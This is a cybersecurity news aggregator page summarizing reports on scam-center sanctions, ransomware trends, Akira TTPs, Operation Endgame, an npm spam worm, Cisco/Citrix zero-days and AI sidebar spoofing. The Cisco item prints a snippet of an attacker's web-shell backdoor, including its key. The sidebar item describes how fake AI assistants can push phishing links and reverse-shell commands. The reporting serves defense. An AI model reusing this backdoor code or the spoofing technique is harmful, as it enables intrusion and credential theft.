Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for US Imposes Sanctions ...

 Governance

The US Treasury Sanctions Burma armed group and several related companies for their alleged involvement in cyber scam centers targeting American citizens. The Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced the designations as part of a broader effort to combat organized crime, human   show more ...

trafficking, and cybercriminal activities operating out of Southeast Asia. According to the Treasury Department, OFAC has sanctioned the Democratic Karen Benevolent Army (DKBA), a Burmese armed group, and four of its senior leaders for supporting cyber scam centers in Burma. These operations reportedly defraud Americans through fraudulent investment schemes. US Treasury Sanctions Burma: OFAC Targets Armed Group and Associated Firms The agency also designated Trans Asia International Holding Group Thailand Company Limited, Troth Star Company Limited, and Thai national Chamu Sawang, citing links to Chinese organized crime networks. These entities were found to be working with the DKBA and other armed groups to establish and expand scam compounds in the region. Under Secretary of the Treasury for Terrorism and Financial Intelligence John K. Hurley stated, “criminal networks operating out of Burma are stealing billions of dollars from hardworking Americans through online scams.” He emphasized that such activities not only exploit victims financially but also contribute to Burma’s civil conflict by funding armed organizations. Scam Center Strike Force Established In coordination with agencies including the Federal Bureau of Investigation (FBI), U.S. Secret Service (USSS), and Department of Justice, a new Scam Center Strike Force has been launched to counter cyber scams originating from Burma, Cambodia, and Laos. This task force will focus on investigating and disrupting the most harmful Southeast Asian scam centers, while also supporting U.S. victims through education and restitution programs. The initiative aims to combine law enforcement, financial action, and diplomatic efforts to curb illicit online operations. [caption id="attachment_106706" align="aligncenter" width="432"] Source: Department of the Treasury’s Office of Foreign Assets Control (OFAC)[/caption] An Ongoing Effort to Protect Victims The US Treasury Sanctions Burma action builds on previous measures targeting illicit actors in the region. Earlier in 2025, the Karen National Army (KNA) and several related companies were sanctioned for their roles in human trafficking and cyber scam activities. Additional designations in Cambodia and Burma followed, targeting groups such as the Prince Group and Huione Group for operating scam compounds and laundering proceeds from virtual currency investment scams. According to government reports, Americans lost over $10 billion in 2024 to Southeast Asia-based cyber scam operations, marking a 66 percent increase from the previous year. Cyber Scams and Human Trafficking Links Investigations revealed that many individuals working in scam centers are victims of human trafficking, coerced into online fraud through threats and violence. Some compounds, including Tai Chang and KK Park in Burma’s Karen State, are known hubs for cyber scams. The DKBA reportedly provides protection for these compounds while also participating in violent acts against trafficked workers. These scam networks often use messaging apps and fake investment platforms to deceive Americans. Victims are manipulated into transferring funds to scam-controlled accounts under the guise of legitimate investments. Sanctions and Legal Implications Following today’s actions, all property and interests of the designated individuals and entities within the United States are now blocked. The sanctions prohibit any U.S. person from engaging in transactions involving these blocked parties. Violations of OFAC regulations could lead to civil or criminal penalties. The US Treasury Sanctions Burma initiative underscores the United States’ continued commitment to disrupting global cyber scam operations, holding organized crime networks accountable, and safeguarding victims of human trafficking and financial exploitation.

image for Ransomware Attacks S ...

 Cyber News

Ransomware attacks soared 30% in October to the second-highest total on record, Cyble reported today. The 623 ransomware attacks recorded in October were second only to February 2025’s record attacks, when a CL0P MFT campaign drove the total number of ransomware attacks to 854. October was the sixth consecutive   show more ...

monthly increase in ransomware attacks, Cyble noted in a blog post. Qilin once again was the most active ransomware group, for the sixth time in the seven months since the decline of RansomHub. Qilin’s 210 claimed victims were three times greater than second-place Akira (chart below). Just behind Akira was Sinobi with 69 victims, a remarkable rise for a group that first emerged in July. [caption id="attachment_106750" align="aligncenter" width="624"] Top ransomware groups October 2025 (Cyble)[/caption] Construction, Professional Services, Healthcare, Manufacturing, IT and Energy/Utilities were the most targeted sectors (chart below). [caption id="attachment_106751" align="aligncenter" width="624"] Ransomware attacks by industry October 2025 (Cyble)[/caption] Cyble noted that 31 incidents in October may have affected critical infrastructure, and another 26 incidents had possible supply chain implications. The U.S. once again was the most attacked country, its 361 attacks 10 times greater than second-place Canada (chart below). [caption id="attachment_106753" align="aligncenter" width="624"] Ransomware attacks by country October 2025 (Cyble)[/caption] “Of concern is the emergence of Australia as a top five target, as the country’s rich resources and high per-capita GDP have made the country a rich target for threat actors,” Cyble noted. Ransomware attacks are up 50% so far this year, with 5,194 ransomware attacks through October 31, Cyble said, “as new leaders like Qilin, Sinobi and The Gentlemen have more than made up for the decline of former leaders such as LockBit and RansomHub.” Vulnerabilities Exploited by Ransomware Groups Critical IT vulnerabilities and unpatched internet-facing assets have fueled a rise in both ransomware and supply chain attacks this year, Cyble said. Vulnerabilities targeted in October included: CVE-2025-61882 in Oracle E-Business Suite – targeted by Cl0p CVE-2025-10035 in GoAnywhere MFT – exploited by Medusa CVE-2021-43226 a Microsoft Windows Privilege Escalation vulnerability – Exploited by unknown ransomware groups, according to a CISA advisory CVE-2025-6264 in Velociraptor – targeted by Warlock ransomware operators CVE‑2024‑1086 in the Linux kernel’s netfilter :nf_tables module – Exploited by unknown ransomware groups, according to a CISA advisory Ransomware Attacks and Key Developments Below were some of the most important ransomware developments in October, according to Cyble. Ransomware operators are “increasingly hijacking or silently installing legitimate remote access tools” such as AnyDesk, RustDesk, Splashtop, and TightVNC after credential compromise to gain persistent access, control, antivirus neutralization and ransomware delivery. Recent BlackSuit campaigns used Vishing to steal VPN credentials for initial access and DCSync on a domain controller for high-privilege access, and used AnyDesk and a custom RAT for persistence. “Other measures included wiping forensic traces with CCleaner, and using Ansible to deploy BlackSuit ransomware across ESXi hosts, encrypting hundreds of VMs and causing major operational disruption,” Cyble said. Qilin affiliates deployed a Linux-based ransomware binary on Windows machines by abusing remote-management tools like WinSCP, Splashtop, AnyDesk, and ScreenConnect, and leveraging BYOVD (Bring Your Own Vulnerable Driver) attacks, among other tools and tactics. Trigona ransomware operators brute-forced exposed MS-SQL servers and embedded malware inside database tables and exporting it to disk to install payloads. DragonForce posted on the RAMP cybercrime forum that it is opening its partner program to the public, offering services like professional file analysis/audit, hash decryption, call support, and free victim storage. Registration requires a $500 non-refundable fee. Affiliates were warned to follow the group’s rules “or face account blocking or free decryptor distribution.” Zeta88 — the alleged operator of The Gentlemen ransomware — announced updates to their Windows, Linux and ESXi lockers, including a silent mode for Windows that encrypts without renaming files and preserves timestamps, and self-spread capabilities across networks and domains. The release also introduced multiple encryption-speed modes, Windows operating modes, and a universal decryptor. The full Cyble blog also included recommended best practices and recent high-confidence Qilin indicators of compromise (IoCs).

image for Phishing Attacks in ...

 Cyber News

Phishing attacks are becoming increasingly targeted as scammers refine their tactics to exploit social and economic issues. Instead of mass emailing identical messages, cybercriminals now create tailored campaigns that appear legitimate to specific audiences. The National Cyber Security Centre (NCSC) has warned that   show more ...

these phishing attacks are becoming more advanced, often imitating trusted institutions such as government agencies, banks, or health insurers. By leveraging familiar branding and credible topics like cryptocurrency or tax rule changes, scammers are deceiving individuals into sharing personal information. Phishing Emails Impersonate Canton of Zurich In one of the latest reported incidents, recipients received emails that appeared to originate from the Canton of Zurich, urging them to update information to comply with new cryptocurrency tax regulations. The email carried the official logo and layout, included a short compliance deadline, and threatened fines or legal action if ignored. [caption id="attachment_106720" align="aligncenter" width="1000"] Source: NCSC[/caption] Victims were directed to a fake website that closely mirrored the legitimate Canton of Zurich portal. After providing personal details such as their address, IBAN, date of birth, and telephone number, users were shown a confirmation page and then redirected to the real website — reinforcing the illusion of authenticity. [caption id="attachment_106721" align="aligncenter" width="1000"] Source: NCSC[/caption]   [caption id="attachment_106722" align="aligncenter" width="1000"] Source: NCSC[/caption]   Although the stolen data might not seem highly sensitive, authorities warn that it can be misused in follow-up scams. For instance, fraudsters may later call victims pretending to be bank representatives, using the collected personal details to sound credible and gain further access. Emails Targeting Senior Citizens A second phishing attack reported by the NCSC impersonated the Federal Tax Administration and focused on senior citizens. These emails referenced pension fund benefits, promising payouts and asking recipients to update their information. The messages used personalized greetings and professional formatting to build trust. While it is unclear if the emails were sent exclusively to older individuals, the targeted tone suggests an attempt to exploit a more vulnerable demographic. [caption id="attachment_106719" align="aligncenter" width="358"] Source: NCSC[/caption] Such campaigns highlight the shift from random spam emails to targeted phishing, where scammers invest more effort in psychological manipulation and social engineering. Recommendations from the NCSC Authorities are advising citizens to remain alert and follow these steps to reduce the risk of falling victim to phishing attacks: Be cautious of any email requesting personal or financial details. Never click on links or fill out forms from unsolicited messages. Verify the sender’s address and look for missing salutations or unofficial URLs. When uncertain, contact the official organization directly for clarification. Report suspicious links to antiphishing.ch. If financial information has been disclosed, contact your bank or card issuer immediately. In case of monetary loss, report the incident to the police via the Suisse ePolice platform. Proactive Measures Against Phishing Attacks The evolution of phishing attacks in Switzerland demonstrates how cybercriminals continuously adapt their methods to exploit trust and uncertainty. While public awareness campaigns remain vital, organizations must also invest in threat intelligence solutions that detect fraudulent domains, fake websites, and malicious email infrastructure before they reach potential victims. Platforms like Cyble provide proactive visibility into phishing campaigns and threat actor activity across the dark web and surface web, enabling businesses to take timely action and protect their customers and employees. Learn more about how intelligence-led defense can safeguard your organization from phishing and social engineering threats: Request a demo from Cyble

image for Akira Ransomware Gro ...

 Cyber News

The Akira ransomware group poses an “imminent threat to critical infrastructure,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned today. CISA joined with the FBI, other U.S. agencies and international counterparts to issue a lengthy updated advisory on the ransomware group, adding many new   show more ...

Akira tactics, techniques and procedures (TTPs), indicators of compromise (IoCs), and vulnerabilities exploited by the group. Akira is consistently one of the most active ransomware groups, so the update from CISA and other agencies is significant. As of late September, Akira has netted about $244.17 million in ransom payments, CISA said. The Akira ransomware group information was sourced from “FBI investigations and trusted third-party reporting,” the agency said. In a busy two days for the agency, CISA also added three vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog (CVE-2025-9242, a WatchGuard Firebox Out-of-Bounds Write vulnerability, CVE-2025-12480, a Gladinet Triofox Improper Access Control vulnerability, and CVE-2025-62215, a Microsoft Windows Race Condition vulnerability), and reissued orders to federal agencies to patch Cisco vulnerabilities CVE-2025-20333 and CVE-2025-20362. Akira Ransomware Group Targets Vulnerabilities for Initial Access The CISA Akira advisory notes that in a June 2025 incident, Akira encrypted Nutanix Acropolis Hypervisor (AHV) virtual machine (VM) disk files for the first time, expanding the ransomware group’s abilities beyond VMware ESXi and Hyper-V by abusing CVE-2024-40766, a SonicWall vulnerability. The updated advisory adds six new vulnerabilities exploited by Akira threat actors for initial access, including: CVE-2020-3580, a cross-site scripting (XSS) vulnerability in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) CVE-2023-28252, a Windows Common Log File System Driver Elevation of Privilege vulnerability CVE-2024-37085, a VMware ESXi authentication bypass vulnerability CVE-2023-27532, a Veeam Missing Authentication for Critical Function vulnerability CVE-2024-40711, a Veeam Deserialization of Untrusted Data vulnerability CVE-2024-40766, a SonicWall Improper Access Control vulnerability “Akira threat actors gain access to VPN products, such as SonicWall, by stealing login credentials or exploiting vulnerabilities like CVE-2024-40766,” the CISA advisory said. In some cases, they gain initial access with compromised VPN credentials, possibly by using initial access brokers or brute-forcing VPN endpoints. The group also uses password spraying techniques and tools such as SharpDomainSpray to gain access to account credentials. Akira threat actors have also gained initial access through the Secure Shell (SSH) protocol by exploiting a router’s IP address. “After tunneling through a targeted router, Akira threat actors exploit publicly available vulnerabilities, such as those found in the Veeam Backup and Replication component of unpatched Veeam backup servers,” the advisory said. Akira’s Latest Discovery, Persistence and Evasion Tactics Visual Basic (VB) scripts are frequently used by the group to execute malicious commands, and nltest /dclist: and nltest /DOMAIN_TRUSTS are used for network and domain discovery. Akira threat actors abuse remote access tools such as AnyDesk and LogMeIn for persistence and to “blend in with administrator activity,” and Impacket is used to execute the remote command wmiexec.py and obtain an interactive shell. Akira threat actors also uninstall endpoint detection and response (EDR) systems to evade detection. In one incident, Akira threat actors bypassed Virtual Machine Disk (VMDK) file protection by powering down the domain controller’s VM and copying the VMDK files to a newly created VM, CISA said. “This sequence of actions enabled them to extract the NTDS.dit file and the SYSTEM hive, ultimately compromising a highly privileged domain administrator’s account,” the advisory said. Veeam.Backup.MountService.exe has also been used for privilege escalation (CVE-2024-40711), and AnyDesk, LogMeIn, RDP, SSH and MobaXterm have been used for lateral movement. Akira actors have used tunneling utilities such as Ngrok for command and control (C2) communications, initiating encrypted sessions that bypass perimeter monitoring. PowerShell and Windows Management Instrumentation Command-line (WMIC) have also been used to disable services and execute malicious scripts. Akira threat actors have been able to exfiltrate data in just over two hours from initial access, CISA said. The new Akira_v2 variant appends encrypted files with an .akira or .powerranges extension, or with .akiranew or .aki. A ransom note named fn.txt or akira_readme.txt appears in both the root directory (C:) and each user’s home directory (C:Users). CISA recommended a number of security best practices for combatting the Akira ransomware threat, including prioritizing remediating known exploited vulnerabilities, enforcing phishing-resistant multifactor authentication (MFA), and maintaining regular, tested offline backups of critical data.

image for Operation Endgame Di ...

 Threat Actors

The warning arrived on chat at 3:47 AM: "Immediately reinstall your server, erase traces, the German police are acting." Cybercriminals worldwide using the Rhadamanthys infostealer watched in real-time as German law enforcement IP addresses appeared in their web panels, signaling the collapse of what   show more ...

investigators now reveal as one of the largest credential theft operations globally. Between November 10 and 14, 2025, authorities coordinated from Europol's headquarters in The Hague dismantled 1,025 servers supporting the Rhadamanthys infostealer, VenomRAT remote access trojan, and Elysium botnet in the latest phase of Operation Endgame. The infrastructure controlled hundreds of thousands of infected computers containing several million stolen credentials and access to over 100,000 cryptocurrency wallets potentially worth millions of euros. The coordinated international action involved law enforcement from eleven countries including the United States, Canada, Australia, and multiple European nations. Key Suspect Arrested in Greece Authorities arrested a primary suspect linked to VenomRAT operations in Greece on November 3, 2025. The arrest preceded the broader infrastructure takedown by days, suggesting investigators conducted extensive surveillance before executing simultaneous strikes. Officers conducted searches at 11 locations across Germany, Greece, and the Netherlands while seizing 20 domains tied to the malware operations. The Rhadamanthys developer acknowledged the disruption in a Telegram message, claiming German law enforcement accessed their infrastructure. Web panels hosted in EU data centers logged German IP addresses connecting immediately before cybercriminals lost server access, according to messages circulated among the infostealer's customer base. Security researchers known as g0njxa and Gi7w0rm, who monitor malware operations, reported that cybercriminals using Rhadamanthys received urgent warnings about the law enforcement action. Internal communications advised immediate cessation of activities and system reinstallation to erase traces, with operators noting that SSH access suddenly required certificates instead of root passwords. The panic spread rapidly through underground forums as customers realized law enforcement had penetrated their command and control infrastructure. Malware-as-a-Service Business Model Disrupted Rhadamanthys operates on a subscription model where cybercriminals pay monthly fees for malware access, support, and web panels used to collect stolen data. The operation marketed itself professionally as "Mythical Origin Labs" through a Tor website with detailed product descriptions, a Telegram support channel, and communication via Tox messaging. Also read: Be Wary of Google Ads: Rhadamanthys Stealer is Here! The infostealer steals login credentials, browser data, cryptocurrency wallet information, autofilled data, and other sensitive information from browsers, password managers, and crypto wallets. Subscription plans ranged across multiple tiers, providing different levels of functionality and support. The malware commonly spreads through campaigns promoted as software cracks, malicious YouTube videos, or poisoned search advertisements. Most victims remained unaware of infections on their systems, with stolen credentials silently exfiltrated to attacker-controlled infrastructure. VenomRAT functions as a remote access trojan capable of exfiltrating various files, stealing cryptocurrency wallets and browser data, credit card details, account passwords, and authentication cookies. Both malware families operated as enablers for broader cybercrime ecosystems, with customers using stolen data for identity theft, financial fraud, and follow-on attacks. Elysium Botnet Infrastructure Eliminated The Elysium botnet, marketed alongside Rhadamanthys by the same operators as a proxy bot service, fell under the operation's scope. Security researchers assess that machines infected with Rhadamanthys or VenomRAT may have also been equipped with the proxy bot, creating a multi-layered criminal infrastructure serving various malicious purposes. The dismantled infrastructure consisted of hundreds of thousands of infected computers across multiple continents. Many victims unknowingly participated in proxy networks that criminals used to route malicious traffic and obscure attack origins. The Operation Endgame website was updated with new video content mocking Rhadamanthys operators and encouraging their customers to contact law enforcement. The site previously featured countdown timers announcing upcoming actions, creating psychological pressure on cybercriminals. About Operation Endgame Operation Endgame launched with initial actions in May 2024, described by Europol as the largest ever operation against botnets that play major roles in ransomware deployment. Previous phases disrupted IcedID, Bumblebee, Pikabot, Trickbot, SystemBC, SmokeLoader, and DanaBot malware operations. Read: Operation Endgame – Largest Ever Operation Against Multiple Botnets Used to Deliver Ransomware The May 2024 actions resulted in four arrests, over 100 servers taken down across 10 countries, over 2,000 domains brought under law enforcement control, and seizure of €3.5 million in various cryptocurrencies. Shadowserver published a Rhadamanthys Historical Bot Infections Special Report containing information about devices infected between March 14 and October 11, 2025. The report was shared with 201 National CSIRTs in 175 countries and 10,000-plus network owners to identify compromised computers and alert owners. Authorities established accessible resources for concerned victims. Security researchers warn that despite Operation Endgame's successes, some malware operations have demonstrated resilience. DanaBot banking trojan resurfaced with version 669 approximately six months after disruption, focusing on cryptocurrency theft and demonstrating the persistent nature of cybercrime infrastructure. The simultaneous dismantling of three interconnected criminal platforms disrupts infrastructure enabling some of the most damaging cybercrimes globally, though investigators acknowledge the ongoing challenge of preventing criminal groups from rebuilding operations. Also read: Operation Endgame 2.0: Europe’s Cyber Dragnet Just Crippled the Ransomware Economy at Its Source

image for Large-Scale Spam Cam ...

 Firewall Daily

Security researchers have uncovered a large-scale spam campaign within the npm ecosystem, now known as the IndonesianFoods worm. The attack involves over 43,000 spam packages published across at least 11 user accounts over the past two years. Rather than attempting to steal credentials or data, this worm focuses on   show more ...

polluting the npm registry with junk packages, an attack that nearly doubles the known number of malicious npm packages in existence.  The spam campaign began more than two years ago and has continued systematically, flooding the registry with dormant payloads disguised as legitimate projects. Paul McCarty’s investigation revealed that the worm had been quietly operating across multiple accounts, making it harder for detection systems to identify the scale of the operation.  The Naming Scheme Behind the “IndonesianFoods Worm”  The IndonesianFoods worm derives its name from its distinctive naming scheme and the internal dictionaries embedded within its malicious code. The script uses two lists, one containing Indonesian personal names such as andi, budi, cindy, and zul, and another containing Indonesian food terms like rendang, sate, bakso, and tapai.  When executed, the script randomly selects one name, one food term, adds a random number between 1 and 100, and appends a suffix like “-kyuki” or “-breki.” Examples of generated package names include “andi-rendang23-breki” and “zul-tapai9-kyuki.” This combination of names and foods gives the worm both its unique identity and its connection to Indonesia, which inspired its name.  McCarty stated that the attack “focuses on creating new packages rather than stealing credentials or engaging in other immediately malicious behavior.” Instead, it exploits npm’s open publishing model to overwhelm the registry with automated spam, disrupting developers, and polluting search results.  Accounts and Behavior of the Spam Campaign  The IndonesianFoods worm has been traced to at least 11 npm accounts, including voinza, yunina, noirdnv, veyla, vndra, vayza, doaortu, jarwok, bipyruss, sernaam.b.y, and rudiox. Each of these accounts was created specifically for this operation, collectively responsible for publishing thousands of packages. None of them appears to be compromised by legitimate users.  Once the malware is triggered, typically through a file like auto.js, it modifies the package.json file, assigns random version numbers, and publishes new packages continuously using the npm publish command. This happens in an infinite loop, creating a new spam package roughly every seven seconds. The result is an ongoing flood of junk data that strains npm’s infrastructure and risks contaminating legitimate dependency chains if developers accidentally install one of the packages.  Though the payload does not directly steal data or credentials, it turns the npm registry itself into an attack vector, weaponizing its openness to spread an enormous volume of fake packages.  Conclusion  The IndonesianFoods worm exposes how modern spam campaigns in software supply chains rely on automation and persistence to evade detection. Over two years, attackers, possibly linked to Indonesia, published tens of thousands of malicious npm packages, undermining trust in open ecosystems.   With threats growing more coordinated, Cyble’s AI-native threat intelligence platform helps organizations detect, predict, and neutralize new cyber risks. Book a free demo to uncover vulnerabilities and strengthen your defense against large-scale attacks like the IndonesianFoods worm. 

image for Zero-Day Vulnerabili ...

 Firewall Daily

Amazon’s threat intelligence division has revealed a cyber-espionage campaign involving an advanced persistent threat (APT) group exploiting previously undisclosed zero-day vulnerabilities in systems from Cisco and Citrix. The investigation showed that the attackers specifically targeted critical identity and   show more ...

network access control infrastructure; components of enterprises rely on managing authentication and enforcing security policies across their networks.  The initial discovery came from Amazon’s MadPot honeypot service, which detected exploitation attempts of the Citrix “Bleed Two” vulnerability, now tracked as CVE-2025-5777, before it had been made public. This early detection confirmed that the APT had been using the flaw as a zero-day vulnerability.  Further analysis linked the same threat actor to another zero-day vulnerability within Cisco Identity Service Engine (ISE). Amazon shared details of a suspicious payload with Cisco, which led to the identification of a flaw in the deserialization logic of an undocumented Cisco ISE endpoint.   The vulnerability, now designated CVE-2025-20337, allowed pre-authentication remote code execution, granting attackers administrator-level access to affected systems. What raised additional alarm was that this exploitation occurred before Cisco had assigned a CVE number or released patches. Deployment of a Custom Web Shell  Following the successful compromise of targeted systems, the threat actor deployed a custom-built web shell disguised as a legitimate Cisco ISE component called IdentityAuditAction. Unlike typical off-the-shelf malware, this backdoor was tailored specifically for Cisco ISE environments.  Amazon’s investigation revealed that the web shell operated entirely in-memory, leaving minimal traces for forensic analysis. It used Java reflection to inject itself into active threads, registered as an HTTP listener on the Tomcat server to intercept all HTTP requests, and encrypted its communication with DES encryption using non-standard Base64 encoding. Accessing the shell required knowledge of specific HTTP headers, further obscuring its presence.  The following snippet from the deserialization routine demonstrates the actor’s authentication mechanism for accessing the backdoor:  if (matcher.find()) {    requestBody = matcher.group(1).replace("*", "a").replace("$", "l");    Cipher encodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");    decodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");    byte[] key = "d384922c".getBytes();    encodeCipher.init(1, new SecretKeySpec(key, "DES"));    decodeCipher.init(2, new SecretKeySpec(key, "DES"));    byte[] data = Base64.getDecoder().decode(requestBody);    data = decodeCipher.doFinal(data);    ByteArrayOutputStream arrOut = new ByteArrayOutputStream();    if (proxyClass == null) {        proxyClass = this.defineClass(data);    } else {        Object f = proxyClass.newInstance();        f.equals(arrOut);        f.equals(request);        f.equals(data);        f.toString();    } }   Defensive Measures for CVE-2025-20337 and CVE-2025-5777  The simultaneous exploitation of CVE-2025-20337 and CVE-2025-5777 demonstrates the growing trend of APTs focusing on identity and access control infrastructure as high-value targets. According to Amazon, the attacks were indiscriminate and internet-facing, meaning any unpatched or exposed systems were at risk during the campaign.  The “patch-gap” exploitation, attacking systems in the window before vendors can issue fixes, highlights a persistent challenge in enterprise cybersecurity. Such tactics are commonly used by well-funded threat groups that possess advanced research capabilities or access to undisclosed vulnerability data.  Amazon emphasized that even well-maintained systems can fall victim to pre-authentication zero-days, denoting the need for defense-in-depth strategies. Security teams are advised to:  Restrict access to privileged security appliance endpoints like Cisco ISE and Citrix management portals through network segmentation and firewalls.  Closely monitor for anomalous activity, such as unrecognized HTTP listeners, unusual in-memory processes, or encryption anomalies.  Stay current with vendor advisories and threat intelligence feeds regarding emerging zero-day vulnerabilities.  Minimize public internet exposure of critical identity and network control systems, routing access through VPNs or isolated management interfaces.  Conclusion  Amazon’s findings reveal how today’s threat actors are targeting identity and access systems as key entry points. By exploiting CVE-2025-5777 in Citrix and CVE-2025-20337 in Cisco ISE, attackers demonstrated both precision and intent.  Cyble helps enterprises stay ahead of such threats with its advanced Vulnerability Management platform. By monitoring emerging zero-days, prioritizing patches by risk, and offering deep insights into active exploits, Cyble empowers security teams to act before attackers do.  Schedule a demo to discover how its AI-driven intelligence can strengthen your defense against modern cyber threats. 

image for How a fake AI sideba ...

 Threats

Cybersecurity researchers have revealed a new attack method targeting AI browsers, which they refer to as AI sidebar spoofing. This attack exploits users’ growing habit of blindly trusting instructions they get from artificial intelligence. The researchers successfully implemented AI sidebar spoofing against two   show more ...

popular AI browsers: Comet by Perplexity and Atlas by OpenAI. Initially, the researchers used Comet for their experiments, but later confirmed that the attack was viable in the Atlas browser as well. This post uses Comet as an example when explaining the mechanics of AI sidebar spoofing, but we urge the reader to remember that everything stated below also applies to Atlas. How do AI browsers work? To begin, let’s wrap our heads around AI browsers. The idea of artificial intelligence replacing, or at least transforming the familiar process of searching the internet began to generate buzz between 2023 and 2024. The same period saw the first-ever attempts to integrate AI into online searches. Initially, these were supplementary features within conventional browsers — such as Microsoft Edge Copilot and Brave Leo — implemented as AI sidebars. They added built-in assistants to the browser interface for summarizing pages, answering questions, and navigating sites. By 2025, the evolution of this concept ushered in Comet from Perplexity AI — the first browser designed for user-AI interaction from the ground up. This made artificial intelligence the centerpiece of Comet’s user interface, rather than just an add-on. It unified search, analysis, and work automation into a seamless experience. Shortly thereafter, in October 2025, OpenAI introduced its own AI browser, Atlas, which was built around the same concept. Comet’s primary interface element is the input bar in the center of the screen, through which the user interacts with the AI. It’s the same with Atlas. The home screens of Comet and Atlas demonstrate a similar concept: a minimalist interface with a central input bar and built-in AI that becomes the primary method of interacting with the web Besides, AI browsers allow users to engage with the artificial intelligence right on the web page. They do this through a built-in sidebar that analyzes content and handles queries — all without having the user leave the page. The user can ask the AI to summarize an article, explain a term, compare data, or generate a command while remaining on the current page. The sidebars in both Comet and Atlas allow users to query the AI without navigating to separate tabs — you can analyze the current site, and ask questions and receive answers within the context of the page you’re on This level of integration conditions users to take the answers and instructions provided by the built-in AI for granted. When an assistant is seamlessly built into the user interface and feels like a natural part of the system, most people rarely stop to double-check the actions it suggests. This trust is precisely what the attack demonstrated by the researchers exploits. A fake AI sidebar can issue false instructions — directing the user to execute malicious commands or visit phishing websites. How did the researchers manage to execute the AI sidebar spoofing attack? The attack starts with the user installing a malicious extension. To do its evil deeds, it needs permissions to view and modify data on all visited sites, as well as access to the client-side data storage API. All of these are quite standard permissions; without the first one — no browser extension will work at all. Therefore, the chances that the user will get suspicious when a new extension requests these permissions are almost zero. You can read more about browser extensions and the permissions they request in our post Browser extensions: more dangerous than you think. A list of installed extensions in the Comet user interface. The disguised malicious extension, AI Marketing Tool, is visible among them. Source Once installed, the extension injects JavaScript into the web page and creates a counterfeit sidebar that looks strikingly similar to the real thing. This shouldn’t raise any red flags with the user: when the extension receives a query, it talks to the legitimate LLM and faithfully displays its response. The researchers used Google Gemini in their experiments, though OpenAI’s ChatGPT likely would have worked just as well. The screenshot shows an example of a fake sidebar that’s visually very similar to the original Comet Assistant. Source The fake sidebar can selectively manipulate responses to specific topics or key queries set in advance by the potential attacker. This means that in most cases, the extension will simply display legitimate AI responses, but in certain situations it will display malicious instructions, links, or commands instead. How realistic is the scenario where an unsuspecting user installs a malicious extension capable of the actions described above? Experience shows it is highly probable. On our blog, we’ve repeatedly reported on dozens of malicious and suspicious extensions that successfully make it into the official Chrome Web Store. This continues to occur despite all the security checks conducted by the store and the vast resources at Google’s disposal. Read more about how malicious extensions end up in official stores in our post 57 shady Chrome extensions clock up six million installs. Consequences of AI sidebar spoofing Now let’s discuss what attackers can use a fake sidebar for. As noted by the researchers, the AI sidebar spoofing attack offers potential malicious actors ample opportunities to cause harm. To demonstrate this, the researchers described three possible attack scenarios and their consequences: crypto-wallet phishing, Google account theft, and device takeover. Let’s examine each of them in detail. Using a fake AI sidebar to steal Binance credentials In the first scenario, the user asks the AI in the sidebar how to sell their cryptocurrency on the Binance crypto exchange. The AI assistant provides a detailed answer that includes a link to the crypto exchange. But this link doesn’t lead to the real Binance site — it takes you to a remarkably convincing fake. The link points to the attacker’s phishing site, which uses the fake domain name binacee. The fake login form on the domain login{.}binacee{.}com is nearly indistinguishable from the original, and is designed to steal user credentials. Source Next, the unsuspecting user enters their Binance credentials and the code for two-factor authentication, if needed. After this, the attackers gain full access to the victim’s account and can siphon off all funds from their crypto wallets. Using a fake AI sidebar to take over a Google account The next attack variation also begins with a phishing link — in this case, to a fake file-sharing service. If the user clicks the link, they’re taken to a website where the landing page prompts them to sign in with their Google account right away. After the user clicks this option, they’re redirected to the legitimate Google login page to enter their credentials there, but then the fake platform requests full access to the user’s Google Drive and Gmail. The fake application share-sync-pro{.}vercel{.}app requests full access to the user’s Gmail and Google Drive. This gives the attackers control over the account. Source If the user fails to scrutinize the page, and automatically clicks Allow, they grant attackers permissions for highly dangerous actions: Viewing their emails and settings. Reading, creating, and sending emails from their Gmail account. Viewing and downloading all the files they store in Google Drive. This level of access gives the cybercriminals the ability to steal the victim’s files, use services and accounts linked to that email address, and impersonate the account owner to disseminate phishing messages. Reverse shell initiated through a fake AI-generated utility installation guide Finally, in the last scenario, the user asks the AI how to install a certain application; the Homebrew utility was used in the example, but it could be anything. The sidebar shows the user a perfectly reasonable, AI-generated guide. All steps in it look plausible and correct up until the final stage, where the utility installation command is replaced with a reverse shell. The guide for installing the utility as shown in the sidebar is almost entirely correct, but the last step contains a reverse shell command. Source If the user follows the AI’s instructions by copying and pasting the malicious code into the terminal and then running it, their system will be compromised. The attackers will be able to download data from the device, monitor activity, or install malware and continue the attack. This scenario clearly demonstrates that a single replaced line of code in a trusted AI interface is capable of fully compromising a device. How to avoid becoming a victim of fake AI-sidebars The AI sidebar spoofing attack scheme is currently only theoretical. However, in recent years attackers have been very quick to turn hypothetical threats into practical attacks. Thus, it’s quite possible that some malware creator is already hard at work on a malicious extension using a fake AI-sidebar, or uploading one to an official extension store. Therefore, it’s important to remember that even a familiar browser interface can be compromised. And even if instructions look convincing and come from the in-browser AI assistant, you shouldn’t blindly trust them. Here’s some final tips to help you avoid falling victim to an attack involving fake AI: When using AI assistants, carefully check all commands and links before following the AI’s recommendations. If the AI recommends executing any programming code, copy it and find out what it does by pasting it into a search engine in a different, non-AI browser. Don’t install browser extensions — AI or otherwise — unless absolutely necessary. Regularly clean up and delete any extensions you no longer use. Before installing an extension, read the user reviews. Most malicious extensions rack up heaps of scathing reviews from duped users long before store moderators get around to removing them. Before entering credentials or other confidential information, always check that the website address doesn’t look suspicious or contain typos. Pay attention to the top-level domain, too: it should be the official one. Use Kaspersky Password Manager to store passwords. If it doesn’t recognize the site and doesn’t automatically offer to fill in the login and password fields, this is a strong reason to ask yourself if you might be on a phishing page. Install a reliable security solution that will alert you to suspicious activity on your device and prevent you from visiting a phishing site. What other threats await you in browsers ­— AI-powered or regular: The pros and cons of AI-powered browsers Taking the biscuit: why hackers like cookies so much Turning purple: how visited links threaten your privacy Privacy under attack: nasty surprises in Chrome, Edge, and Firefox Dangerous browser extensions

image for Google Sues to Disru ...

 A Little Sunshine

